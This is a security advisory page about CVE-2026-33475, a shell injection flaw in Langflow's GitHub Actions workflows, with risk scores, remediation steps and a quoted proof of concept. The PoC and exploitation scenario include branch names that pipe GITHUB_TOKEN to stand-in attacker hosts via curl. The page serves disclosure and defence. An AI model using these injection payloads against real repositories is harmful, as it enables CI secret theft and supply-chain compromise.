AI Threat Alert AI Threat Alert

CVE-2026-33475: langflow: security flaw enables exploitation

CRITICAL CISA: ATTEND
Published March 24, 2026
CISO Take

Langflow's GitHub Actions CI/CD pipeline has a critical unauthenticated shell injection flaw (CVSS 9.1) exploitable by any GitHub user with fork access via a maliciously named pull request branch. Update to Langflow v1.9.0 immediately and verify the integrity of any Langflow artifacts (PyPI packages, container images) consumed from the affected window. Audit all internal GitHub Actions workflows for unquoted ${{ github.* }} interpolation in run: steps — this class of vulnerability is endemic across AI/ML open-source repos.

Risk Assessment

Critical. Exploitability is maximal: zero authentication required, trivial PoC (one branch creation + one PR), and GitHub Actions is the attack surface — no special network access needed. The blast radius extends beyond the Langflow repository itself: exfiltrated GITHUB_TOKEN grants write access to push poisoned releases, container images, and PyPI packages to the entire Langflow downstream consumer base. Any AI/ML team auto-updating Langflow in production LLM agent pipelines is transitively at risk of receiving compromised artifacts.

Affected Systems

Package Ecosystem Vulnerable Range Patched
langflow pip No patch
147.6K Pushed 6d ago 32% patched ~53d to patch Full package profile →

Do you use langflow? You're affected.

Severity & Risk

CVSS 3.1
9.1 / 10
EPSS
0.1%
chance of exploitation in 30 days
Higher than 19% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A None

Recommended Action

6 steps

  1. Patch: Update Langflow to v1.9.0.

  2. Audit: Search all GitHub Actions workflows for direct ${{ github.head_ref }}, ${{ github.event.pull_request.title }}, and ${{ inputs.* }} interpolation inside run: blocks — use CodeQL or Semgrep rule 'github-actions-injection'.

  3. Remediate: Move context values to env: variables (env: BRANCH: ${{ github.head_ref }}) and reference $BRANCH in run: steps.

  4. Harden: Restrict GITHUB_TOKEN permissions to minimum required (contents: read, packages: none) via permissions: blocks.

  5. Verify: For orgs consuming Langflow, validate checksums of installed packages from the pre-1.9.0 window against known-good hashes.

  6. Detect: Instrument CI runners to alert on unexpected outbound HTTP/DNS requests; review GitHub Actions audit logs for anomalous token usage from the affected period.

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Supply Chain Code Execution Data Extraction Framework Agent AML.T0010.001 AML.T0010.004 AML.T0025 AML.T0050 AML.T0055

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.10.3 - AI system supply chain management
NIST AI RMF
MANAGE 2.2 - Mechanisms are in place to respond to and recover from AI risks
OWASP LLM Top 10
LLM03 - Supply Chain

Frequently Asked Questions

What is CVE-2026-33475?

Langflow's GitHub Actions CI/CD pipeline has a critical unauthenticated shell injection flaw (CVSS 9.1) exploitable by any GitHub user with fork access via a maliciously named pull request branch. Update to Langflow v1.9.0 immediately and verify the integrity of any Langflow artifacts (PyPI packages, container images) consumed from the affected window. Audit all internal GitHub Actions workflows for unquoted ${{ github.* }} interpolation in run: steps — this class of vulnerability is endemic across AI/ML open-source repos.

Is CVE-2026-33475 actively exploited?

No confirmed active exploitation of CVE-2026-33475 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-33475?

1. Patch: Update Langflow to v1.9.0. 2. Audit: Search all GitHub Actions workflows for direct ${{ github.head_ref }}, ${{ github.event.pull_request.title }}, and ${{ inputs.* }} interpolation inside run: blocks — use CodeQL or Semgrep rule 'github-actions-injection'. 3. Remediate: Move context values to env: variables (env: BRANCH: ${{ github.head_ref }}) and reference $BRANCH in run: steps. 4. Harden: Restrict GITHUB_TOKEN permissions to minimum required (contents: read, packages: none) via permissions: blocks. 5. Verify: For orgs consuming Langflow, validate checksums of installed packages from the pre-1.9.0 window against known-good hashes. 6. Detect: Instrument CI runners to alert on unexpected outbound HTTP/DNS requests; review GitHub Actions audit logs for anomalous token usage from the affected period.

What systems are affected by CVE-2026-33475?

This vulnerability affects the following AI/ML architecture patterns: CI/CD pipelines, agent frameworks, LLM workflow orchestration, training pipelines, model serving.

What is the CVSS score for CVE-2026-33475?

CVE-2026-33475 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 0.06%.

Technical Details

NVD Description

Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability. --- ### Details Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as: ```yaml run: | validate_branch_name "${{ github.event.pull_request.head.ref }}" ``` Or: ```yaml run: npx playwright install ${{ inputs.browsers }} --with-deps ``` Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection. --- ### PoC 1. **Fork** the Langflow repository 2. **Create a new branch** with the name: ```bash injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 3. **Open a Pull Request** to the main branch from the new branch 4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`) 5. The `run:` step containing: ```yaml echo "Branch: ${{ github.head_ref }}" ``` Will execute: ```bash echo "Branch: injection-test" curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 6. The attacker receives the CI secret via the exfil URL. --- ### Impact - **Type:** Shell Injection / Remote Code Execution in CI - **Scope:** Any public Langflow fork with GitHub Actions enabled - **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data --- ### Suggested Fix Refactor affected workflows to **use environment variables** and wrap them in **double quotes**: ```yaml env: BRANCH_NAME: ${{ github.head_ref }} run: | echo "Branch is: \"$BRANCH_NAME\"" ``` Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value. --- ### Affected Files (Langflow `1.3.4`) - `.github/actions/install-playwright/action.yml` - `.github/workflows/deploy-docs-draft.yml` - `.github/workflows/docker-build.yml` - `.github/workflows/release_nightly.yml` - `.github/workflows/python_test.yml` - `.github/workflows/typescript_test.yml`

Exploitation Scenario

An adversary targeting an AI/ML team's Langflow-based LLM agent pipeline forks the Langflow repository and creates a branch named 'fix/docs && curl https://attacker.com/x?t=$GITHUB_TOKEN && echo'. They open a PR triggering deploy-docs-draft.yml; the workflow's run: step echo "Branch: ${{ github.head_ref }}" resolves to the injected payload and executes it, sending the GITHUB_TOKEN out-of-band. The adversary authenticates to GitHub with the token, pushes a backdoored release tag with a modified langflow Python package containing a persistent reverse shell, and publishes it to PyPI. Organizations with auto-update enabled in their LLM agent CI pipelines pull the compromised version on next build, granting the adversary RCE inside production AI infrastructure — potentially including access to model weights, vector databases, and inference endpoints.

Weaknesses (CWE)

CWE-74 Primary CWE-78 Primary

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

References

Timeline

Published
March 24, 2026
Last Modified
March 24, 2026
First Seen
March 24, 2026

Related Vulnerabilities

CRITICAL CVE-2026-33309 9.9

langflow: Path Traversal enables file access

Same package: langflow
CRITICAL CVE-2024-37014 9.8

Langflow: unauthenticated RCE via custom component API

Same package: langflow
CRITICAL CVE-2026-27966 9.8

langflow: Code Injection enables RCE

Same package: langflow
CRITICAL CVE-2026-33017 9.8

langflow: Code Injection enables RCE

Same package: langflow
CRITICAL CVE-2024-42835 9.8

Langflow: Unauthenticated RCE via PythonCodeTool

Same package: langflow
Back to Threat Feed